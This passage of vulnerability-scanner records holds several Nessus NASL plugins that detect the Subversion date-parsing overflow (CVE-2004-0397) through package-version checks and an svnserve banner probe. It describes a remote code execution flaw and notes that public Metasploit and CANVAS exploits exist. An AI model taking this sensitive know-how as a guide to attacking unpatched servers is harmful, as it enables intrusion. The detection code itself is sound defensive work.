'http://www.FreeBSD.org/ports/portaudit/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_cvs_date(\"$Date: 2011/10/03 00:48:25 $\");\n script_end_attributes();\n script_summary(english:\"Check for subversion\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #36673 (freebsd_pkg_5d36ef32a9cf11d89c6d0020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"subversion<1.0.2_1\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-01-01T05:50:03", "description": "The remote host is vulnerable to a remote stack-based\noverflow. An attacker, exploiting this hole, would be\ngiven full access to the target machine. Versions of\nSubversion less than 1.0.3 are vulnerable to this attack.\nThis vulnerability was discovered by Stefan Esser and posted\nto public mailing lists.", "edition": 25, "published": "2004-06-08T00:00:00", "title": "Subversion < 1.0.3 apr_time_t data Conversion Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2021-01-02T00:00:00", "cpe": [], "id": "SUBVERSION_1_0_4.NASL", "href": "https://www.tenable.com/plugins/nessus/12261", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude( 'compat.inc' );\n\nif(description)\n{\n script_id(12261);\n script_version (\"1.19\");\n script_cve_id(\"CVE-2004-0397\");\n script_bugtraq_id(10386);\n\n script_name(english:\"Subversion < 1.0.3 apr_time_t data Conversion Remote Overflow\");\n script_summary(english:\"Subversion remote Buffer Overflow\");\n\n script_set_attribute(\n attribute:'synopsis',\n value:'The remote service is vulnerable to a buffer overflow.'\n );\n\n script_set_attribute(\n attribute:'description',\n value:'The remote host is vulnerable to a remote stack-based\noverflow. An attacker, exploiting this hole, would be\ngiven full access to the target machine. Versions of\nSubversion less than 1.0.3 are vulnerable to this attack.\nThis vulnerability was discovered by Stefan Esser and posted\nto public mailing lists.'\n );\n\n script_set_attribute(\n attribute:'solution',\n value:'Upgrade to version 1.0.3 or higher'\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(\n attribute:'see_also',\n value:'https://seclists.org/bugtraq/2004/May/216'\n );\n\n script_set_attribute(\n attribute:'see_also',\n value:'http://subversion.tigris.org/svn-sscanf-advisory.txt'\n );\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/06/08\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2004/05/19\");\n script_cvs_date(\"Date: 2018/11/15 20:50:24\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_end_attributes();\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Misc.\");\n script_dependencie(\"subversion_detection.nasl\");\n script_require_ports(\"Services/subversion\");\n exit(0);\n}\n\n\n\n# start check\n# mostly horked from MetaSploit Framework subversion overflow check\n\nport = get_kb_item(\"Services/subversion\");\nif ( ! port ) port = 3690;\n\nif (! get_tcp_port_state(port))\n\texit(0);\n\ndat = string(\"( 2 ( edit-pipeline ) 24:svn://host/svn/nessusr0x ) \");\n\nsoc = open_sock_tcp(port);\nif (!soc)\n exit(0);\n\nr = recv_line(socket:soc, length:1024);\n\nif (! r)\n\texit(0);\n\nsend(socket:soc, data:dat);\nr = recv_line(socket:soc, length:256);\n\nif (! r)\n\texit(0);\n\n#display(r);\n\nif (egrep(string:r, pattern:\".*subversion-1\\.0\\.[0-2][^0-9].*\"))\n{\n\tsecurity_hole(port);\n}\n\nclose(soc);\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:44:24", "description": "Stefan Esser reports :\n\nSubversion versions up to 1.0.2 are vulnerable to a date parsing\nvulnerability which can be abused to allow remote code execution on\nSubversion servers and therefore could lead to a repository\ncompromise.\n\nNOTE: This vulnerability is similar to the date parsing issue that\naffected neon. However, it is a different and distinct bug.", "edition": 24, "published": "2009-04-23T00:00:00", "title": "FreeBSD : subversion date parsing vulnerability (5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2009-04-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:subversion"], "id": "FREEBSD_PKG_5D36EF32A9CF11D89C6D0020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/nessus/36673", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(36673);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0397\");\n\n script_name(english:\"FreeBSD : subversion date parsing vulnerability (5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser reports :\n\nSubversion versions up to 1.0.2 are vulnerable to a date parsing\nvulnerability which can be abused to allow remote code execution on\nSubversion servers and therefore could lead to a repository\ncompromise.\n\nNOTE: This vulnerability is similar to the date parsing issue that\naffected neon. However, it is a different and distinct bug.\"\n );\n # http://security.e-matters.de/advisories/082004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a28c1fb\"\n );\n # https://vuxml.freebsd.org/freebsd/5d36ef32-a9cf-11d8-9c6d-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c36501c0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"subversion<1.0.2_1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:51:49", "description": "The remote host is affected by the vulnerability described in GLSA-200405-14\n(Buffer overflow in Subversion)\n\n All releases of Subversion prior to 1.0.3 have a vulnerability in the\n date-parsing code. This vulnerability may allow denial of service or\n arbitrary code execution as the Subversion user. Both the client and\n server are vulnerable, and write access is NOT required to the server's\n repository.\n \nImpact :\n\n All servers and clients are vulnerable. Specifically, clients that\n allow other users to write to administrative files in a working copy\n may be exploited. Additionally all servers (whether they are httpd/DAV\n or svnserve) are vulnerable. Write access to the server is not\n required; public read-only Subversion servers are also exploitable.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.", "edition": 26, "published": "2004-08-30T00:00:00", "title": "GLSA-200405-14 : Buffer overflow in Subversion", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-08-30T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:subversion"], "id": "GENTOO_GLSA-200405-14.NASL", "href": "https://www.tenable.com/plugins/nessus/14500", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200405-14.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14500);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"GLSA\", value:\"200405-14\");\n\n script_name(english:\"GLSA-200405-14 : Buffer overflow in Subversion\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200405-14\n(Buffer overflow in Subversion)\n\n All releases of Subversion prior to 1.0.3 have a vulnerability in the\n date-parsing code. This vulnerability may allow denial of service or\n arbitrary code execution as the Subversion user. Both the client and\n server are vulnerable, and write access is NOT required to the server's\n repository.\n \nImpact :\n\n All servers and clients are vulnerable. Specifically, clients that\n allow other users to write to administrative files in a working copy\n may be exploited. Additionally all servers (whether they are httpd/DAV\n or svnserve) are vulnerable. Write access to the server is not\n required; public read-only Subversion servers are also exploitable.\n \nWorkaround :\n\n There is no known workaround at this time. All users are encouraged to\n upgrade to the latest available version.\"\n );\n # http://subversion.tigris.org/servlets/ReadMsg?list=announce&msgNo=125\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1853132a\"\n );\n # http://security.e-matters.de/advisories/082004.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a28c1fb\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200405-14\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Subversion users should upgrade to the latest stable version:\n # emerge sync\n # emerge -pv '>=dev-util/subversion-1.0.3'\n # emerge '>=dev-util/subversion-1.0.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-util/subversion\", unaffected:make_list(\"ge 1.0.3\"), vulnerable:make_list(\"le 1.0.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dev-util/subversion\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-07-23T00:00:00", "title": "Fedora Core 1 : subversion-0.32.1-2 (2004-127)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-07-23T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:subversion-debuginfo", "p-cpe:/a:fedoraproject:fedora:subversion-devel", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:mod_dav_svn", "p-cpe:/a:fedoraproject:fedora:subversion"], "id": "FEDORA_2004-127.NASL", "href": "https://www.tenable.com/plugins/nessus/13702", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-127.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13702);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"FEDORA\", value:\"2004-127\");\n\n script_name(english:\"Fedora Core 1 : subversion-0.32.1-2 (2004-127)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-May/000131.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?618b8f54\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_dav_svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"mod_dav_svn-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-debuginfo-0.32.1-2\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"subversion-devel-0.32.1-2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_dav_svn / subversion / subversion-debuginfo / subversion-devel\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:05:41", "description": "Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-07-23T00:00:00", "title": "Fedora Core 2 : subversion-1.0.2-2.1 (2004-128)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0397"], "modified": "2004-07-23T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora_core:2", "p-cpe:/a:fedoraproject:fedora:subversion-debuginfo", "p-cpe:/a:fedoraproject:fedora:subversion-devel", "p-cpe:/a:fedoraproject:fedora:mod_dav_svn", "p-cpe:/a:fedoraproject:fedora:subversion", "p-cpe:/a:fedoraproject:fedora:subversion-perl"], "id": "FEDORA_2004-128.NASL", "href": "https://www.tenable.com/plugins/nessus/13703", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-128.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13703);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0397\");\n script_xref(name:\"FEDORA\", value:\"2004-128\");\n\n script_name(english:\"Fedora Core 2 : subversion-1.0.2-2.1 (2004-128)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Stefan Esser discovered an issue in the date parsing routines in\nSubversion which allows a buffer overflow. An attacker could send\nmalicious requests to a Subversion server (either Apache-based using\nmod_dav_svn, or using the svnserve daemon) and perform arbitrary\nexecution of code. \n\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0397 to this issue. This update includes\npackages with a patch for this issue.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-May/000132.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?887ce9e5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Subversion Date Svnserve');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mod_dav_svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:subversion-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 2.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC2\", reference:\"mod_dav_svn-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-debuginfo-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-devel-1.0.2-2.1\")) flag++;\nif (rpm_check(release:\"FC2\", reference:\"subversion-perl-1.0.2-2.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mod_dav_svn / subversion / subversion-debuginfo / subversion-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], 